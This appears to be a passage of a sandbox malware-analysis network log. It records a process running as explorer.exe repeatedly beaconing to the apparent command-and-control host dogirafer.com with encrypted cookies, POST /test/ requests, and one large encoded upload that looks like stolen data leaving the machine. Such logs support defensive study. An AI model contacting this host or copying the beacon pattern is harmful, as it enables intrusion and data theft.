                                                                                                                                                                              2024-12-03 16:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.449948104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:32 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hudViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:34 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:33 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHRQlAagGNd2hhy8She5wOBguUuhrGMSxsjEDHq%2BE5HukxjPJXKwPTzy9QK3LVf1Zvt4JRWbHStAYVo8udMBa25rSD8ya1cSAYkFrq37Glk2zvU3N5T6V%2B%2FUjqbeipRk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50717be4fc477-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2737&min_rtt=2590&rtt_var=1266&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=774125&cwnd=173&unsent_bytes=0&cid=9eccdf9714059121&ts=1676&x=0"
                                                                                                                                                                              2024-12-03 16:45:34 UTC343INData Raw: 31 35 30 0d 0a 4d 79 71 65 54 4d 71 33 30 49 70 69 61 68 7a 61 68 47 54 70 67 33 4e 4c 4d 30 33 54 42 79 48 43 62 50 2b 79 76 69 62 4f 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 30 55 6f 65 70 62 67 37 46 6f 6c 43 37 4f 2f 74 71 4e 47 74 4a 71 6d 70 73 45 2f 67 69 64 55 46 57 4a 4f 35 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 4d 77 31 44 4f 33 72 4b 58 4d 5a 62 62 66 41 66 33 63 76 71 34 4e 42 36 31 58 5a 44 68 73 70 67 45 34 36 4f 46 6f 49 50 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 46 55 51 70
                                                                                                                                                                              Data Ascii: 150MyqeTMq30IpiahzahGTpg3NLM03TByHCbP+yvibOYGmcphSGpB6yiJiVjA1mI0Uoepbg7FolC7O/tqNGtJqmpsE/gidUFWJO5sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FMw1DO3rKXMZbbfAf3cvq4NB61XZDhspgE46OFoIP8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfFUQp
                                                                                                                                                                              2024-12-03 16:45:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.449956104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:35 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 12228
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:35 UTC12228OUTData Raw: 4c 48 54 64 46 35 33 74 6a 37 77 78 62 6d 69 35 78 51 36 78 71 48 4d 55 61 45 6d 44 54 6c 6a 59 4d 35 2f 4c 79 31 69 4b 4e 33 6a 4c 33 41 33 35 74 79 61 35 68 5a 69 70 34 7a 56 71 57 44 52 39 65 75 69 59 38 43 39 31 61 38 57 32 2b 2f 56 35 77 65 7a 47 77 38 6c 69 6c 46 4a 51 53 78 38 55 6e 6f 62 5a 51 6c 64 48 61 6c 51 2b 53 48 44 4a 35 5a 65 78 46 52 4f 65 7a 52 74 4b 4e 72 51 42 78 71 67 55 38 30 79 2b 32 4e 65 6c 41 77 6b 52 67 41 4f 56 65 48 6d 56 61 72 74 43 5a 62 6d 2b 66 56 68 34 42 4d 33 46 41 77 52 50 6f 74 51 50 6e 44 61 4a 62 33 4d 62 30 69 46 71 5a 69 4a 37 4f 74 76 38 47 65 72 63 61 45 66 45 4c 55 36 77 5a 48 6a 76 54 67 38 66 48 79 76 4c 38 43 70 36 61 72 59 35 6f 4a 53 41 71 34 64 35 49 50 53 69 70 34 75 4a 58 49 59 57 50 2b 53 6e 45 6d 58
                                                                                                                                                                              Data Ascii: LHTdF53tj7wxbmi5xQ6xqHMUaEmDTljYM5/Ly1iKN3jL3A35tya5hZip4zVqWDR9euiY8C91a8W2+/V5wezGw8lilFJQSx8UnobZQldHalQ+SHDJ5ZexFROezRtKNrQBxqgU80y+2NelAwkRgAOVeHmVartCZbm+fVh4BM3FAwRPotQPnDaJb3Mb0iFqZiJ7Otv8GercaEfELU6wZHjvTg8fHyvL8Cp6arY5oJSAq4d5IPSip4uJXIYWP+SnEmX
                                                                                                                                                                              2024-12-03 16:45:36 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:36 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMJvyqiKdc3ikEh1t2rn2VbuRhDPu9rMSuDDNZYv9mSbOyIeZ0Yq%2BM0X9tYWDMiUr6NFK%2BDYnQnzO4EwsAwDyVubJsAPga17Ev03eRA8g8Ky7ORs4eF%2Fl9WXECJ6oLMC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50728ab068c1b-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1778&rtt_var=690&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13324&delivery_rate=1559829&cwnd=210&unsent_bytes=0&cid=65274decc1260858&ts=1557&x=0"
                                                                                                                                                                              2024-12-03 16:45:36 UTC584INData Raw: 32 34 34 0d 0a 4f 53 6d 66 52 4d 53 7a 33 59 70 6a 61 78 72 63 6a 47 62 6f 67 33 39 49 4f 6b 76 56 42 53 6e 43 61 2f 71 30 76 69 50 4f 5a 6d 6d 63 70 6d 50 35 32 47 37 59 36 76 4b 47 74 44 42 75 49 55 34 6a 65 74 2f 6a 69 31 59 6a 43 4c 72 51 74 36 6b 4a 73 5a 58 6a 6d 66 49 35 36 79 52 57 48 47 4a 4f 67 4d 75 6f 4e 6c 6f 54 45 30 46 4c 44 51 43 38 35 63 4c 45 49 32 76 5a 74 32 6c 4d 59 4d 73 55 69 74 64 76 68 68 66 74 70 61 62 47 62 58 42 6d 39 55 7a 6d 48 53 53 4f 45 63 45 32 44 65 37 69 4b 58 4d 54 61 62 66 44 66 6e 49 75 71 37 70 38 36 46 72 66 44 52 39 45 67 69 59 31 4e 56 4d 41 50 49 2b 48 44 4a 2b 61 45 7a 58 47 66 6a 53 47 45 44 32 66 4e 51 4a 4c 59 54 36 48 74 46 6f 71 47 75 56 46 33 5a 47 70 78 50 63 5a 63 4a 48 66 38 34 44 67 50 76 35 61 52 70
                                                                                                                                                                              Data Ascii: 244OSmfRMSz3YpjaxrcjGbog39IOkvVBSnCa/q0viPOZmmcpmP52G7Y6vKGtDBuIU4jet/ji1YjCLrQt6kJsZXjmfI56yRWHGJOgMuoNloTE0FLDQC85cLEI2vZt2lMYMsUitdvhhftpabGbXBm9UzmHSSOEcE2De7iKXMTabfDfnIuq7p86FrfDR9EgiY1NVMAPI+HDJ+aEzXGfjSGED2fNQJLYT6HtFoqGuVF3ZGpxPcZcJHf84DgPv5aRp
                                                                                                                                                                              2024-12-03 16:45:36 UTC3INData Raw: 7a 0d 0a
                                                                                                                                                                              Data Ascii: z
                                                                                                                                                                              2024-12-03 16:45:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.449962104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:38 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:39 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:39 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8Fiu6HYP7xHix4lkg0WG3dRSN2ANv%2F%2FHIqxmoACDqnrPjrXz4%2BSq0%2B3UE6gpYXu6yX3CqMNWBgt0y9nFBntAnYsQY2tbuZWrSmu1RUvVRNGse8FsKvODb9fWqg863r7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5073b98325e64-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1704&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1676234&cwnd=245&unsent_bytes=0&cid=7e4bf6c8c54809a3&ts=1651&x=0"
                                                                                                                                                                              2024-12-03 16:45:39 UTC339INData Raw: 31 34 63 0d 0a 4f 79 71 61 51 38 71 77 33 49 70 75 5a 52 6e 52 68 32 4b 73 7a 48 35 49 4f 6b 72 65 41 30 36 73 62 66 6d 37 75 69 2f 45 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 72 4a 55 49 74 66 4a 71 4f 69 6c 30 6b 43 72 57 35 73 65 30 4c 73 35 75 6f 6f 38 30 39 67 69 68 56 46 57 4e 49 37 63 72 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 77 33 41 65 50 6b 54 68 55 52 5a 62 58 47 65 33 4e 68 34 49 5a 4f 37 56 58 64 5a 78 39 43 69 30 38 37 4e 6c 4e 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 69 4f 50 42 62 52 35
                                                                                                                                                                              Data Ascii: 14cOyqaQ8qw3IpuZRnRh2KszH5IOkreA06sbfm7ui/EKRib7xuPoA21j4bUiz5rJUItfJqOil0kCrW5se0Ls5uoo809gihVFWNI7crsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8w3AePkThURZbXGe3Nh4IZO7VXdZx9Ci087NlNEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbiOPBbR5
                                                                                                                                                                              2024-12-03 16:45:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.449972104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:41 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:43 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:43 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PoFCiGqwxmPn%2BzpCKHeNXirc1ouqibxkPb3jAxyYtckvFNTSR97NAGrxY1ypEpgArd5H6K7X%2B6eI4hKrWAwTavGAdCttwBeacYhk7rskgcfQOA8B8zijzUfyOxbRSpaN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50750d8571875-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=1533&rtt_var=1679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=490756&cwnd=153&unsent_bytes=0&cid=ffab9b4e6be4f1c0&ts=1653&x=0"
                                                                                                                                                                              2024-12-03 16:45:43 UTC343INData Raw: 31 35 30 0d 0a 4f 43 79 56 51 38 71 37 30 49 70 68 59 78 33 51 68 32 2f 6e 67 33 56 4f 50 45 76 51 42 43 48 43 61 50 6d 78 75 53 66 4d 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 6b 63 75 66 2f 7a 69 67 6c 67 72 43 72 53 39 2f 61 67 50 74 35 75 74 70 63 46 52 36 69 4e 64 48 47 4e 4e 37 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 41 45 4d 38 77 44 4f 6e 6b 54 68 67 52 61 37 50 4a 65 48 64 68 35 6f 5a 4f 36 46 48 65 41 48 5a 48 68 45 41 34 4e 46 49 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 2f 56 51 51 5a
                                                                                                                                                                              Data Ascii: 150OCyVQ8q70IphYx3Qh2/ng3VOPEvQBCHCaPmxuSfMbGmcphSGpB6yiJiVjA1sLkcuf/ziglgrCrS9/agPt5utpcFR6iNdHGNN74+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzAEM8wDOnkThgRa7PJeHdh5oZO6FHeAHZHhEA4NFIBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZO/VQQZ
                                                                                                                                                                              2024-12-03 16:45:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.449979104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:44 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:45 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:45 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8%2BSgji2Hky1qYfhMQhMMO%2BUpe45ocqhiBrpAVMZoYklyH4KTAYkN1y5ibuBKF6lHMjQ3GM96YysOFnwHWZ%2BWRvUgH8v3Jd5vNlzTgSmQBKLjcJyJAsny3Btjv91Jv3T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507637f548c90-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1791&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1560662&cwnd=201&unsent_bytes=0&cid=46d6ede712a4137b&ts=1401&x=0"
                                                                                                                                                                              2024-12-03 16:45:45 UTC343INData Raw: 31 35 30 0d 0a 50 79 75 59 52 4d 57 78 32 34 70 6e 59 42 6e 5a 6a 47 4c 6a 67 33 35 48 50 6b 4c 51 42 69 54 43 5a 2f 2b 31 76 53 2f 4a 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 6b 38 75 65 35 44 68 37 46 6b 6b 44 72 61 34 74 4b 64 47 74 70 53 74 72 4d 45 38 37 45 35 51 48 47 56 4c 36 4d 4b 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 34 42 75 76 6d 4a 42 68 2b 61 4c 48 44 63 33 6b 75 35 38 74 42 37 56 54 55 43 68 6c 43 37 45 77 31 4f 46 67 42 4e 34 58 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 56 51 5a
                                                                                                                                                                              Data Ascii: 150PyuYRMWx24pnYBnZjGLjg35HPkLQBiTCZ/+1vS/JbWmcphSGpB6yiJiVjA1qIk8ue5Dh7FkkDra4tKdGtpStrME87E5QHGVL6MKnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kck4BuvmJBh+aLHDc3ku58tB7VTUChlC7Ew1OFgBN4XMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1VQZ
                                                                                                                                                                              2024-12-03 16:45:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.2.449986104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:47 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:48 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:48 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSqrAGQwc2xkeaKfCZlJY0LeQlT2IHAjCRffzA745jdH3v7skdIDdddeegkXqp1subTY6QAdVQEPP1wJ%2Bea6TbP%2FLuZ%2FfdjA62U9FtzG4e4%2F%2BJSGVDliGb0pWg9wtxBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50774fc8a4363-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1624&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1798029&cwnd=235&unsent_bytes=0&cid=d6ac00d7edce4bc3&ts=1605&x=0"
                                                                                                                                                                              2024-12-03 16:45:48 UTC347INData Raw: 31 35 34 0d 0a 50 79 57 55 51 73 4f 78 32 34 70 67 59 42 6e 62 68 47 44 6d 67 33 4a 4b 50 45 33 52 41 69 6e 43 61 2f 79 7a 75 53 44 4b 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 30 49 70 65 35 54 6c 37 46 59 6e 43 62 71 36 75 61 5a 47 75 35 61 6e 70 4d 77 35 35 55 35 52 48 47 64 45 35 73 57 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 77 41 65 50 6d 4b 42 68 2b 61 37 58 49 63 33 59 70 37 73 74 45 36 6c 48 5a 41 42 68 4f 37 45 30 2b 4d 31 73 4c 4f 34 54 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 54 70
                                                                                                                                                                              Data Ascii: 154PyWUQsOx24pgYBnbhGDmg3JKPE3RAinCa/yzuSDKZmmcphSGpB6yiJiVjA1rJ0Ipe5Tl7FYnCbq6uaZGu5anpMw55U5RHGdE5sWnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwwAePmKBh+a7XIc3Yp7stE6lHZABhO7E0+M1sLO4TMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RTp
                                                                                                                                                                              2024-12-03 16:45:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.2.449994104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:50 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:51 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:51 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npHkA8rMXzPOlR9EW8rbeytXF5yLRAwTfhwx%2FnIrkWsUkELdZ6llwj%2FZucozQhIwgs1epoErGs2AgPbSdVsdV%2Bii1OEMyTfjTwin1iNsNH0lZWdWbAUu4VS6fYTz9iup"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507877d6443e9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1706&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1651583&cwnd=241&unsent_bytes=0&cid=e6af19fe87f1528d&ts=1664&x=0"
